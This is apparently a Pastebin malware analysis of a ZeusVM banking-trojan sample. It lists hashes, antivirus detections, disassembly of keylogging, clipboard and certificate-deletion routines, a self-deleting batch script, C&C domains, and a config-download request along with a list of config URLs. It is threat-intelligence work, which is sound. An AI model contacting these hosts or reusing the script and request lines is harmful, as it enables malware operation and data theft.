SHARE
TWEET

#MalwareMustDie | ZeusVM w/ 0x02 Signed Sample

MalwareMustDie May 24th, 2014 747 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustdie | ZeusVM analysis
  2. // Sample:
  3. // SHA256: 0663c151e7107e6d5378ecba52753f78ad50761ac6e32b63b95172dc840a1225
  4. // File name: tmp2a10246c.exe
  5.  
  6. // binhex..
  7. [0x00000000:0x00400000]> x
  8. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
  9. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
  10. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  11. 0030   00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00    ................
  12. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
  13. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
  14. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
  15. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
  16. 0080   D3 FC B3 4D 97 9D DD 1E 97 9D DD 1E 97 9D DD 1E    ...M............
  17. 0090   54 92 80 1E 91 9D DD 1E 14 81 D3 1E 95 9D DD 1E    T...............
  18. 00A0   F8 82 D7 1E 9C 9D DD 1E F8 82 D9 1E 95 9D DD 1E    ................
  19. 00B0   A1 BB D6 1E 94 9D DD 1E A1 BB D9 1E 94 9D DD 1E    ................
  20. 00C0   97 9D DC 1E BF 9C DD 1E 7F 82 D6 1E 9D 9D DD 1E    ................
  21. 00D0   50 9B DB 1E 96 9D DD 1E 52 69 63 68 97 9D DD 1E    P.......Rich....
  22. 00E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  23. 00F0   50 45 00 00 4C 01 04 00 A3 4E 38 53 00 00 00 00    PE..L....N8S....
  24. 0100   00 00 00 00 E0 00 0F 04 0B 01 02 00 00 00 00 00    ................
  25. 0110   00 50 00 00 00 00 00 00 26 54 00 00 00 10 00 00    .P......&T......
  26. 0120   00 60 00 00 00 00 40 00 00 10 00 00 00 10 00 00    .`....@.........
  27.  
  28. // VT already detected with most AV
  29. File ./tmp2a10246c.exe with MD5 95deb733bee27a2897f24f2d1e3618c4
  30. ----------------------------------------------------------------
  31.    SHA256:
  32.    0663c151e7107e6d5378ecba52753f78ad50761ac6e32b63b95172dc840a1225
  33.    File name: tmp2a10246c.exe
  34.    Detection ratio: 33 / 52
  35.    Analysis date: 2014-05-23 20:04:36 UTC ( 11 hours, 5 minutes ago )
  36.    First submission 2014-05-23 20:04:36 UTC ( 11 hours, 5 minutes ago )
  37.    Last submission 2014-05-23 20:04:36 UTC ( 11 hours, 5 minutes ago )
  38.  
  39. Bkav                     : W32.GenericPwsylazT.Trojan
  40. MicroWorld-eScan         : Trojan.GenericKDZ.25005
  41. nProtect                 : Trojan.GenericKDZ.25005
  42. McAfee                   : Downloader-FYH!95DEB733BEE2
  43. Malwarebytes             : Spyware.Zbot.ED
  44. Zillya                   : Trojan.Zbot.Win32.151539
  45. NANO-Antivirus           : Trojan.Win32.PornoAsset.cwapdj
  46. Symantec                 : Trojan.Zbot
  47. ESET-NOD32               : a variant of Win32/Injector.BBFY
  48. TrendMicro-HouseCall     : TROJ_GEN.R0C1C0EDG14
  49. Avast                    : Sf:Zbot-GG [Trj]
  50. Kaspersky                : Trojan-Spy.Win32.Zbot.saoh
  51. BitDefender              : Trojan.GenericKDZ.25005
  52. Agnitum                  : Trojan.Badur!
  53. Ad-Aware                 : Trojan.GenericKDZ.25005
  54. Sophos                   : Troj/HkMain-U
  55. F-Secure                 : Trojan.GenericKDZ.25005
  56. DrWeb                    : Trojan.Winlock.11260
  57. VIPRE                    : Trojan.Win32.Generic!BT
  58. TrendMicro               : TROJ_GEN.R0C1C0EDG14
  59. McAfee-GW-Edition        : Downloader-FYH!95DEB733BEE2
  60. Emsisoft                 : Trojan.GenericKDZ.25005 (B)
  61. Antiy-AVL                : Trojan/Win32.Badur
  62. Microsoft                : VirTool:Win32/CeeInject.gen!KK
  63. SUPERAntiSpyware         : Trojan.Agent/Gen-Zusy
  64. GData                    : Trojan.GenericKDZ.25005
  65. AhnLab-V3                : Trojan/Win32.Ransomlock
  66. VBA32                    : Hoax.PornoAsset
  67. Panda                    : Trj/Zbot.M
  68. Ikarus                   : Trojan.Inject2
  69. Fortinet                 : W32/KRYPTIK.TY!tr
  70. AVG                      : Inject2.YSJ
  71. Baidu-International      : Trojan.Win32.Zbot.aL
  72.  
  73. // PE header basic information
  74.    Target machine Intel 386 or later processors and compatible processors
  75.    Compilation timestamp 2014-03-30 17:04:35
  76.    Link date 6:04 PM 3/30/2014
  77.    Entry Point 0x00005426
  78.    Number of sections 4
  79.  
  80. // PE sections
  81.   .text 4096 19392 20480 6.04 c50bd6f985985237d249564fc757469f
  82.   .rdata 24576 7778 8192 4.56 4d46641fc046f62c6bd32d5420314c38
  83.   .data 32768 768 4096 1.37 d499d4b20e3aaa0f8246be7e242bc1af
  84.   .rsrc 36864 5888 8192 3.76 3af9a03ce363600d40f31e75aa8aa812
  85.  
  86. // Number of PE resources by language
  87.    CHINESE SIMPLIFIED 17
  88.  
  89.  
  90. // ==========================
  91. // TYPICAL ZEUS FUNCTION:
  92. // ==========================
  93.  
  94. // functionality to read the clipboard data
  95.  
  96.  
  97. 004144EA        push ebp       
  98. 004144EB        mov ebp, esp   
  99. 004144ED        push esi       
  100. 004144EE        mov esi, dword ptr [ebp+08h]   
  101. 004144F1        push edi       
  102. 004144F2        push esi       
  103. 004144F3        call dword ptr [0040135Ch]      GetClipboardData@USER32.DLL (Import, Unknown Params)
  104. 004144F9        mov edi, eax   
  105. 004144FB        mov dword ptr [ebp+08h], edi   
  106. 004144FE        call 004203BAh  target: 004203BA
  107. 00414503        test al, al    
  108. 00414505        jne 0041450Eh   target: 0041450E
  109.  
  110. // and keyboard logger....
  111.  
  112.  00414422       mov edi, eax   
  113. 00414424        call dword ptr [00401278h]      GetTickCount@KERNEL32.DLL (Import, Unknown Params) xref: 00414420
  114. 0041442A        push eax       
  115. 0041442B        push dword ptr [00428DCCh]     
  116. 00414431        lea eax, dword ptr [esp+44h]   
  117. 00414435        push edi       
  118.  
  119.  00414476       lea eax, dword ptr [esp+78h]   
  120. 0041447A        push eax       
  121. 0041447B        call dword ptr [00401380h]      GetKeyboardState@USER32.DLL (Import, Unknown Params)
  122. 00414481        test eax, eax  
  123.  
  124. // downloader....
  125.  
  126. 004168AA        push edi       
  127. 004168AB        call dword ptr [004013E0h]      InternetQueryDataAvailable@WININET.DLL (Import, Unknown Params)
  128. 004168B1        jmp 004168E1h   target: 004168E1
  129. 004168B3        push dword ptr [ebp+18h]        xref: 0041689C
  130. 004168B6        push dword ptr [ebp+14h]       
  131. 004168B9        push ebx       
  132. 004168BA        push edi       
  133. 004168BB        call dword ptr [004013C8h]      InternetReadFileExW@WININET.DLL (Import, Unknown Params)
  134. 004168C1        jmp 004168E1h   target: 004168E1
  135. 004168C3        push dword ptr [ebp+18h]        xref: 00416899
  136. 004168C6        push dword ptr [ebp+14h]       
  137. 004168C9        push ebx       
  138. 004168CA        push edi       
  139. 004168CB        call dword ptr [004013DCh]      InternetReadFileExA@WININET.DLL (Import, Unknown Params)
  140. 004168D1        jmp 004168E1h   target: 004168E1
  141. 004168D3        push dword ptr [ebp+10h]        xref: 00416896
  142. 004168D6        push dword ptr [ebp+0Ch]       
  143. 004168D9        push ebx       
  144. 004168DA        push edi       
  145. 004168DB        call dword ptr [00401400h]      InternetReadFile@WININET.DLL (Import, Unknown Params)
  146. 004168E1        mov dword ptr [ebp-04h], eax    xref: 004168D1 004168C1 004168B1
  147. 004168E4        mov eax, dword ptr [ebp-04h]    xref: 0041689F 0041688D
  148. 004168E7        pop edi
  149. 004168E8        pop esi
  150. 004168E9        pop ebx
  151. 004168EA        leave  
  152. 004168EB        retn 0014h      function end
  153.  
  154. // confusing with google access
  155.  
  156. in binary and memory: http://www.google.com/webhp
  157.  
  158. // Backdoor...
  159.  
  160. Source: C:\tmp2a10246c.exe      Code function: 1_2_0040C257 socket,bind,closesocket,    1_2_0040C257
  161. Source: C:\tmp2a10246c.exe      Code function: 1_2_0040BE70 socket,bind,listen,closesocket,     1_2_0040BE70
  162. Source: C:\tmp2a10246c.exe      Code function: 1_1_0040C257 socket,bind,closesocket,    1_1_0040C257
  163. Source: C:\tmp2a10246c.exe      Code function: 1_1_0040BE70 socket,bind,listen,closesocket,     1_1_0040BE70
  164. Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_2_0040C257 socket,bind,closesocket,    3_2_0040C257
  165. Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_2_0040BE70 socket,bind,listen,closesocket,     3_2_0040BE70
  166. Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_1_0040C257 socket,bind,closesocket,    3_1_0040C257
  167. Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_1_0040BE70 socket,bind,listen,closesocket,     3_1_0040BE70
  168. Source: C:\WINDOWS\explorer.exe Code function: 4_2_0264C257 socket,bind,#3,     4_2_0264C257
  169. Source: C:\WINDOWS\explorer.exe Code function: 4_2_0264BE70 socket,bind,listen,#3,      4_2_0264BE70
  170.  
  171. // Self copy:
  172.  
  173. File created: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe
  174.  
  175. // dynamically determine API calls
  176.  
  177.  0041C0BA       mov eax, edi   
  178. 0041C0BC        push eax       
  179. 0041C0BD        call dword ptr [004011F8h]      LoadLibraryW@KERNEL32.DLL (Import, Unknown Params)
  180. 0041C0C3        mov dword ptr [ebp-30h], eax   
  181. 0041C0C6        cmp eax, ebx
  182.  
  183. 0041C0D9        mov eax, edi   
  184. 0041C0DB        push eax       
  185. 0041C0DC        push dword ptr [ebp-30h]       
  186. 0041C0DF        call dword ptr [00401290h]      GetProcAddress@KERNEL32.DLL (Import, Unknown Params)
  187. 0041C0E5        cmp eax, ebx   
  188. 0041C0E7        je 0041C2B8h    target: 0041C2B8
  189. 0041C0ED        push ebx       
  190.  
  191. 0041C2B3        call 0041B441h  target: 0041B441
  192. 0041C2B8        push dword ptr [ebp-30h]        xref: 0041C0E7 0041C0FB
  193. 0041C2BB        call dword ptr [00401298h]      FreeLibrary@KERNEL32.DLL (Import, Unknown Params)
  194. 0041C2C1        pop edi xref: 0041C0AC 0041C0B4 0041C0C8
  195. 0041C2C2        pop esi
  196.  
  197. // check VM by enamurate list of files in a dir:
  198.        
  199. 0040E8F6 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,
  200.  
  201.  
  202. // sigged.. with unverified.
  203.  
  204. $ gnusigcheck /MMD/Sigcheck/tmp2a10246c.exe:
  205.         Verified:       n/a
  206.         Link date:      2:04 2014/03/31
  207.         Publisher:      n/a
  208.         Description:    n/a
  209.         Product:        n/a
  210.         Prod version:   n/a
  211.         File version:   n/a
  212.         MachineType:    32-bit
  213.         Binary Version: n/a
  214.         Original Name:  n/a
  215.         Internal Name:  n/a
  216.         Copyright:      n/a
  217.         Comments:       n/a
  218.         Entropy:        7.699
  219.         VT detection:   33/52
  220.  
  221. // query sig (MS)
  222.  
  223. 00417588        push 00000000h 
  224. 0041758A        xor bl, bl     
  225. 0041758C        call dword ptr [00401090h]      CertOpenSystemStoreW@CRYPT32.DLL (Import, Unknown Params)
  226. 00417592        mov edi, eax   
  227. 00417594        test edi, edi  
  228. 00417596        je 004175CCh    target: 004175CC
  229. 00417598        push ebp       
  230. 00417599        mov ebp, dword ptr [00401088h]  CertEnumCertificatesInStore@CRYPT32.DLL (Import, Unknown Params)
  231. 0041759F        push esi       
  232. 004175A0        push 00000000h 
  233. 004175A2        jmp 004175B7h   target: 004175B7
  234. 004175A4        push esi        xref: 004175BE
  235. 004175A5        call dword ptr [00401084h]      CertDuplicateCertificateContext@CRYPT32.DLL (Import, Unknown Params)
  236. 004175AB        test eax, eax  
  237. 004175AD        je 004175B6h    target: 004175B6
  238. 004175AF        push eax       
  239. 004175B0        call dword ptr [00401094h]      CertDeleteCertificateFromStore@CRYPT32.DLL (Import, Unknown Params)
  240. 004175B6        push esi        xref: 004175AD
  241. 004175B7        push edi        xref: 004175A2
  242. 004175B8        call ebp        CertEnumCertificatesInStore@CRYPT32.DLL (Import, Unknown Params)
  243. 004175BA        mov esi, eax   
  244. 004175BC        test esi, esi  
  245. 004175BE        jne 004175A4h   target: 004175A4
  246. 004175C0        push eax       
  247. 004175C1        push edi       
  248. 004175C2        mov bl, 01h    
  249. 004175C4        call dword ptr [0040108Ch]      CertCloseStore@CRYPT32.DLL (Import, Unknown Params)
  250. 004175CA        pop esi
  251.  
  252. // Check Native system,,
  253.  
  254.  0041994F       push edi       
  255. 00419950        push dword ptr [00429028h]     
  256. 00419956        call dword ptr [0040127Ch]      WaitForSingleObject@KERNEL32.DLL (Import, Unknown Params)
  257. 0041995C        test eax, eax  
  258. 0041995E        je 004199D8h    target: 004199D8
  259.  
  260.  0041996C       push edi       
  261. 0041996D        push esi       
  262. 0041996E        call dword ptr [00428B50h]      ZwQueryInformationProcess@NTDLL.DLL (Import, Hidden, Unknown Params)
  263. 00419974        test eax, eax  
  264. 00419976        js 004199D8h    target: 004199D8
  265.  
  266. 004199EB        push dword ptr [ebp+08h]       
  267. 004199EE        call dword ptr [00428B48h]      ZwCreateThread@NTDLL.DLL (Import, Hidden, Unknown Params)
  268. 004199F4        pop edi
  269. 004199F5        pop esi
  270.  
  271. // system reboot comnd:
  272.  
  273. Hook base address: 0420B31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
  274.  
  275. // Assembly just too long,, I summarized:
  276.  
  277. // Malicious activity:
  278.  
  279. functionality to inject threads in other processes     
  280. functionality to launch a program with higher privileges       
  281. allocation memory in foreign processes 
  282. changes memory atrrib in foreign processes to executable or writable   
  283. functionality to write to remote processes     
  284. Injects a PE file into a foreign processes     
  285. Maps a DLL or memory area into another process 
  286. Modifies the context of a thread in another process (thread injection) 
  287. Writes to foreign memory regions
  288. etc...
  289.  
  290. // Anti Debugging Sumary (bad news for OllyDBG , Immunity and WInDBG:
  291.  
  292. Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  293. Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)    
  294. Contains functionality to dynamically determine API calls      
  295. Source: C:\tmp2a10246c.exe      Code function: 1_2_0041C075 LoadLibraryW,GetProcAddress,FreeLibrary,    1_2_0041C075
  296. Contains functionality which may be used to detect a debugger (GetProcessHeap) 
  297. Creates guard pages, often used to prevent reverse engineering and debugging
  298.  
  299. //====================
  300. // FULL BEHAVIOIR
  301. // yep, I run it w/o problem..coz MMD NEVER use VM..
  302. // ===================
  303.  
  304. // Overall malware process spawn:
  305.     tmp2a10246c.exe (PID: 1996 MD5: 95DEB733BEE27A2897F24F2D1E3618C4)
  306.         tmp2a10246c.exe (PID: 1644 MD5: 95DEB733BEE27A2897F24F2D1E3618C4)
  307.             raqah.exe (PID: 1556 MD5: 9F2939AED6D92F0BEFF66B02039B9CC4)
  308.                 raqah.exe (PID: 1144 MD5: 9F2939AED6D92F0BEFF66B02039B9CC4)
  309.                     explorer.exe (PID: 1564 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
  310.             cmd.exe (PID: 332 cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp33865f44.bat MD5: 6D778E0F95447E6546553EEEA709D03C)
  311.  
  312. // Batch installer used:
  313. @echo off
  314. :d
  315. del "C:\tmp2a10246c.exe"
  316. if exist "C:\tmp2a10246c.exe" goto d
  317. del /F "C:\Users\admin\AppData\Local\Temp\tmp86e978e8.bat"
  318.  
  319. // =====================================
  320. // Config CNC: 56b1af1270e.ru (fakes), tmp71.edns.su (real) port 443 non SSL
  321.         eolambow.com
  322. // =====================================
  323.   domain now is sinkholed by ABUSE.CH 192.42.116.41
  324.   original IP: 173.193.197.194
  325.    sinkholed2:
  326. //headers:
  327. HTTP/1.1 200 OK
  328. X-Sinkhole: Malware sinkhole
  329. Content-Type: text/html
  330. Server: nginx/0.7.65
  331. Date: Sat, 24 May 2014 08:24:41 GMT
  332. Content-Length: 0
  333.  
  334. // =====================================
  335. // Networking (Zeus config download)
  336. // =====================================
  337.  
  338. // config:
  339.  
  340. GET /cfg.jpg HTTP/1.1
  341. Accept: */*
  342. Connection: Close
  343. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET4.0C; .NET4.0E)
  344. Host: 56b1af1270e.ru
  345. Cache-Control: no-cache
  346.  
  347. // callbacks/ dmn searched:  tmp71.edns.su
  348. // Additional configs: (thanks Xylit0l)
  349. https: //tmp71.edns.su/css/logo.jpg
  350. http: //eolambow.com/rvidmppgu/cfg.bin
  351.  
  352. // Config points from config file (thanks Raashid)
  353. https://5.39.222.133/css/css.php?d=1
  354. https://5.39.222.133/css/css.php
  355. https://autopark-deutsch.ro/images/logo.jpg
  356. https://majak-it.home.pl/images/1.jpg
  357. http://fp-mk.net78.net/images/foto1.jpg
  358. http://lew.com.pl/img/play.jpg
  359. http://paknex.com.pl/fotki/chrysanthemum.jpg
  360. http://infoforex.pl/owka.jpg
  361. http://admsckm.cal24.pl/images/joomla_logo_black.jpg
  362. http://kotlydomino.pl/flagapl.jpg
  363. http://www.wilab.pl/fotki/acienie.jpg
  364. http://www.setmapw.pl/image/kropki.jpg
  365. http://7lo.bydgoszcz.pl/images/joomla_logo_black.jpg
  366. https://d65g.dw7g3.dns-free.su/config.jpg
  367. https://d65g.dw7g3.dn3gwe.su/config.jpg
  368. https://d65g.dw7g3.dnesa343.ru/config.jpg
  369. https://d65g.dw7g3.dndfr44.su/config.jpg
  370. https://d65g.dw7g3.d33jd.net/config.jpg
  371. https://d65g.dw7g3.fefg934.info/config.jpg
  372. https://d65g.dw7g3.46hf44.tv/config.jpg
  373. https://d65g.dw7g3.dnrrrrrrrr.xxx/config.jpg
  374.  
  375. // PoC.. tcpdump, yes, FreeBSD box capture as bridge, outside of the box!!!
  376.  
  377. No.     Time        Source                Destination           Protocol Length Info
  378.       1 0.000000    x.x.x.x          195.186.1.121         DNS      73     Standard query 0x2395  A tmp71.edns.su
  379.  
  380. Frame 1: 73 bytes on wire (584 bits), 73 bytes captured (584 bits)
  381. Ethernet II, Src: CadmusCo_20:fd:a9 (08:00:27:20:fd:a9), Dst: 0a:00:27:00:00:00 (0a:00:27:00:00:00)
  382. Internet Protocol Version 4, Src: x.x.x.x (x.x.x.x), Dst: 195.186.1.121 (195.186.1.121)
  383. User Datagram Protocol, Src Port: 64934 (64934), Dst Port: domain (53)
  384. Domain Name System (query)
  385.  
  386. No.     Time        Source                Destination           Protocol Length Info
  387.       2 0.097632    195.186.1.121         x.x.x.x          DNS      73     Standard query response 0x2395 No such name
  388.  
  389. Frame 2: 73 bytes on wire (584 bits), 73 bytes captured (584 bits)
  390. Ethernet II, Src: 0a:00:27:00:00:00 (0a:00:27:00:00:00), Dst: CadmusCo_20:fd:a9 (08:00:27:20:fd:a9)
  391. Internet Protocol Version 4, Src: 195.186.1.121 (195.186.1.121), Dst: x.x.x.x (x.x.x.x)
  392. User Datagram Protocol, Src Port: domain (53), Dst Port: 64934 (64934)
  393. Domain Name System (response)
  394.  
  395. ----
  396. #MalwareMustDie | malwaremustdie.org
RAW Paste Data
Pastebin PRO BLACK FRIDAY Special!
Get 60% OFF on Pastebin PRO accounts!
Top